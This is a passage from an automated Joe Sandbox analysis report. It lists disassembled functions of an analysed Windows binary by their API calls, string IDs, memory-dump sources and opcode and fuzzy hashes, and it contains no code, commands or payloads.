                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001AC8BB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                              • Opcode ID: a9e7f406bc0895feb58875ee2d25e26c48ee693c27134842657c0e83f469bcb4
                                                                                                                              • Instruction ID: fe18a6720671ac42f8e44766e532b43afbb244205bd41331e9a53528eb573a38
                                                                                                                              • Opcode Fuzzy Hash: a9e7f406bc0895feb58875ee2d25e26c48ee693c27134842657c0e83f469bcb4
                                                                                                                              • Instruction Fuzzy Hash: C821D0B5A00208BBDF04EBA4CC86EFEBBBAEF56300F104015F511E7191DB799859EB60
                                                                                                                              Function 001AC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32 ref: 001AC8D9
                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 001AC8EE
                                                                                                                              • _wcscmp.LIBCMT ref: 001AC900
                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001AC97B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                                              • Opcode ID: a5cf80964daeaaafb95a79b8ff06bdf3df90b7d12b3f26b7fc38d5540382b9ff
                                                                                                                              • Instruction ID: 55234841a41531cb3701e16daea90891cfce6dd33b83d5379c910c4e85f21825
                                                                                                                              • Opcode Fuzzy Hash: a5cf80964daeaaafb95a79b8ff06bdf3df90b7d12b3f26b7fc38d5540382b9ff
                                                                                                                              • Instruction Fuzzy Hash: 9511E97F648313F9FE052A34EC0ADB777EDDB17768B200012F901E90D2FBA269558594
                                                                                                                              Function 001BB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 001BB137
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafeVartype
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1725837607-0
                                                                                                                              • Opcode ID: 03d83000b69067876cb58c40b123406345da0903b15e5e6032083bc94a71a695
                                                                                                                              • Instruction ID: 24cec7f6210d0b85faef9136d0c1d1209141d044ac1b7464b64d037286ae4ccf
                                                                                                                              • Opcode Fuzzy Hash: 03d83000b69067876cb58c40b123406345da0903b15e5e6032083bc94a71a695
                                                                                                                              • Instruction Fuzzy Hash: 80C16A75A0821A9FDB04DF98D4C1BEEB7F4FF08315F20406AE616E7651C7B5AA81CB90
                                                                                                                              Function 0019BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 0019BA74
                                                                                                                                • Part of subcall function 00198984: __mtinitlocknum.LIBCMT ref: 00198996
                                                                                                                                • Part of subcall function 00198984: RtlEnterCriticalSection.NTDLL(00190127), ref: 001989AF
                                                                                                                              • __calloc_crt.LIBCMT ref: 0019BA85
                                                                                                                                • Part of subcall function 00197616: __calloc_impl.LIBCMT ref: 00197625
                                                                                                                                • Part of subcall function 00197616: Sleep.KERNEL32(00000000,?,00190127,?,0017125D,00000058,?,?), ref: 0019763C
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0019BAA0
                                                                                                                              • GetStartupInfoW.KERNEL32(?,00226990,00000064,00196B14,002267D8,00000014), ref: 0019BAF9
                                                                                                                              • __calloc_crt.LIBCMT ref: 0019BB44
                                                                                                                              • GetFileType.KERNEL32(00000001), ref: 0019BB8B
                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0019BBC4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1426640281-0
                                                                                                                              • Opcode ID: 70e871e294f35c8b4cfd7cb8134143115acdcfd5730c4411c06b58c2bcb553ab
                                                                                                                              • Instruction ID: 0e2e21bc6c75c0556c465cc70016d24a53bc36a632c7e991959ce0b62f2bc98c
                                                                                                                              • Opcode Fuzzy Hash: 70e871e294f35c8b4cfd7cb8134143115acdcfd5730c4411c06b58c2bcb553ab
                                                                                                                              • Instruction Fuzzy Hash: 508102709093558FCF24CF68E9C46ADBBF0AF49324B24826DD4A6AB3D1CB349803CB55
                                                                                                                              Function 001EEC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetClientRect.USER32(?), ref: 001EEC32
                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 001EEC49
                                                                                                                              • GetWindowDC.USER32(?), ref: 001EEC55
                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 001EEC64
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001EEC76
                                                                                                                              • GetSysColor.USER32(00000005), ref: 001EEC94
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 272304278-0
                                                                                                                              • Opcode ID: 318aa2198e3ecf88240739dc4a14851ae0e3170542ff242468f9d2bc2c0265cb
                                                                                                                              • Instruction ID: 42469fbc9477e3107a5015e9ef4bac2cdfdd84be4cc8096d572d283540480a33
                                                                                                                              • Opcode Fuzzy Hash: 318aa2198e3ecf88240739dc4a14851ae0e3170542ff242468f9d2bc2c0265cb
                                                                                                                              • Instruction Fuzzy Hash: 8A214D31504645AFDB21AF74FC48BB97BB6EB05321F104120FA26A50F1CB310A81DF11
                                                                                                                              Function 001AD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnumChildWindows.USER32(?,001ADD46), ref: 001ADC86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                              • API String ID: 3555792229-1603158881
                                                                                                                              • Opcode ID: 7ae60edf4102221b89a2793af9be9852aaf26f210fb2ef3b45145ae476e320da
                                                                                                                              • Instruction ID: 80e3745fba6c8a14e0c44566525969f6d5877af9dcfe042426391a5b79bd1d97
                                                                                                                              • Opcode Fuzzy Hash: 7ae60edf4102221b89a2793af9be9852aaf26f210fb2ef3b45145ae476e320da
                                                                                                                              • Instruction Fuzzy Hash: E691B534A00A06EACB0CEF60E481BEDFB75BF17314F548119D85BA7551DF70AA5ACBA0
                                                                                                                              Function 001745A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001745F0
                                                                                                                              • CoUninitialize.COMBASE ref: 00174695
                                                                                                                              • UnregisterHotKey.USER32(?), ref: 001747BD
                                                                                                                              • DestroyWindow.USER32(?), ref: 001E5936
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 001E599D
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001E59CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                              • String ID: close all
                                                                                                                              • API String ID: 469580280-3243417748
                                                                                                                              • Opcode ID: acc9744a8f1bdad215b0d90bc3d5e4cee23b41132092e676ca01cc0307ad3472
                                                                                                                              • Instruction ID: 1895e225c43afba0ac3bedc538e1855fc2027dc48456d9b4209ed3f33fd3f2e8
                                                                                                                              • Opcode Fuzzy Hash: acc9744a8f1bdad215b0d90bc3d5e4cee23b41132092e676ca01cc0307ad3472
                                                                                                                              • Instruction Fuzzy Hash: DC911D34600602CFC719EF14D895A68F3B5FF25714F5182A9F40AA7262DB30AE66CF10
                                                                                                                              Function 0018C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0018C2D2
                                                                                                                                • Part of subcall function 0018C697: GetClientRect.USER32(?,?), ref: 0018C6C0
                                                                                                                                • Part of subcall function 0018C697: GetWindowRect.USER32(?,?), ref: 0018C701
                                                                                                                                • Part of subcall function 0018C697: ScreenToClient.USER32(?,000000FF), ref: 0018C729
                                                                                                                              • GetDC.USER32 ref: 001EE006
                                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001EE019
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001EE027
                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 001EE03C
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001EE044
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001EE0CF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                              • String ID: U
                                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                                              • Opcode ID: ffa292fc69c4441783824fd594765a092dd6aea6ba4fcf53a1e38a063fc8cb74
                                                                                                                              • Instruction ID: eb62aa1bf7d8fb520361f6823798abbe6fca59b313185ccb2ffb1d7f03153099
                                                                                                                              • Opcode Fuzzy Hash: ffa292fc69c4441783824fd594765a092dd6aea6ba4fcf53a1e38a063fc8cb74
                                                                                                                              • Instruction Fuzzy Hash: C971DE30600648DFCF25DFA4D884AAE7BB2FF48320F144269FD565A1A2C7318991DFA0
                                                                                                                              Function 001C4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001C4C5E
                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001C4C8A
                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 001C4CCC
                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001C4CE1
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C4CEE
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001C4D1E
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 001C4D65
                                                                                                                                • Part of subcall function 001C56A9: GetLastError.KERNEL32(?,?,001C4A2B,00000000,00000000,00000001), ref: 001C56BE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1241431887-3916222277
                                                                                                                              • Opcode ID: 4b4b5ace26f2954817b5e7b7a7bed065cd109df3758c6ab792a2e12c7d960eca
                                                                                                                              • Instruction ID: 5aa18cd392a8ace5b7cee162a8fc08cea601dee0bf12116965115f86a53d6e6a
                                                                                                                              • Opcode Fuzzy Hash: 4b4b5ace26f2954817b5e7b7a7bed065cd109df3758c6ab792a2e12c7d960eca
                                                                                                                              • Instruction Fuzzy Hash: FF418EB1505618BFEB12AFA0DC95FFA77ADEF28314F10411AFA019A151D770DD84DBA0
                                                                                                                              Function 001CBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0020DBF0), ref: 001CBBA1
                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0020DBF0), ref: 001CBBD5
                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001CBD33
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 001CBD5D
                                                                                                                              • StringFromGUID2.COMBASE(?,?,00000028), ref: 001CBEAD
                                                                                                                              • ProgIDFromCLSID.COMBASE(?,?), ref: 001CBEF7
                                                                                                                              • CoTaskMemFree.COMBASE(?), ref: 001CBF14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 793797124-0
                                                                                                                              • Opcode ID: edc2ef7c06754cf9b219ecff251197526ad7b2f9a93958f4da65b7b503b7ee91
                                                                                                                              • Instruction ID: 4a20c14cf381733917d157bf959cf30630aedc727e59d2492ce413b024378247
                                                                                                                              • Opcode Fuzzy Hash: edc2ef7c06754cf9b219ecff251197526ad7b2f9a93958f4da65b7b503b7ee91
                                                                                                                              • Instruction Fuzzy Hash: 28F1F575A04209EFCB04DFA4C885EAEB7B9BF99715F108498F905EB250DB31EE41CB90
                                                                                                                              Function 0018B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001749CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00174954), ref: 00174A23
                                                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0018B85B), ref: 0018B926
                                                                                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0018B85B,00000000,?,?,0018AF1E,?,?), ref: 0018B9BD
                                                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 001EE775
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001EE7EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2402799130-0
                                                                                                                              • Opcode ID: 91394042ab1eec3a55dae725233c9b36d1567b0f4dd15b211e1abbce84c754a3
                                                                                                                              • Instruction ID: 8623f7a393e4b81a6fc392bd11b43198a5d4b610ed1343c42d5348c3a50bb039
                                                                                                                              • Opcode Fuzzy Hash: 91394042ab1eec3a55dae725233c9b36d1567b0f4dd15b211e1abbce84c754a3
                                                                                                                              • Instruction Fuzzy Hash: 4E618D30904B01CFEB35AF26E888B39BBF6FF55316F144519E18686A70C770A9A0DF84
                                                                                                                              Function 001DB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001DB204
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 634782764-0
                                                                                                                              • Opcode ID: fd4a63fa4b5969df28b7a0ee9183edac8d6b55df05cb82e39ec0450b530ea855
                                                                                                                              • Instruction ID: a27347aed5a6eaf2f8f095c154604fe10695e85d4202c86735fdd88c201cab25
                                                                                                                              • Opcode Fuzzy Hash: fd4a63fa4b5969df28b7a0ee9183edac8d6b55df05cb82e39ec0450b530ea855
                                                                                                                              • Instruction Fuzzy Hash: 9E519E31508204FFEF24AF289CC9BAE3B65BB16320F224117F916D63A1CB71E990DB50
                                                                                                                              Function 0018A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 001EE9EA
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001EEA0B
                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001EEA20
                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001EEA3D
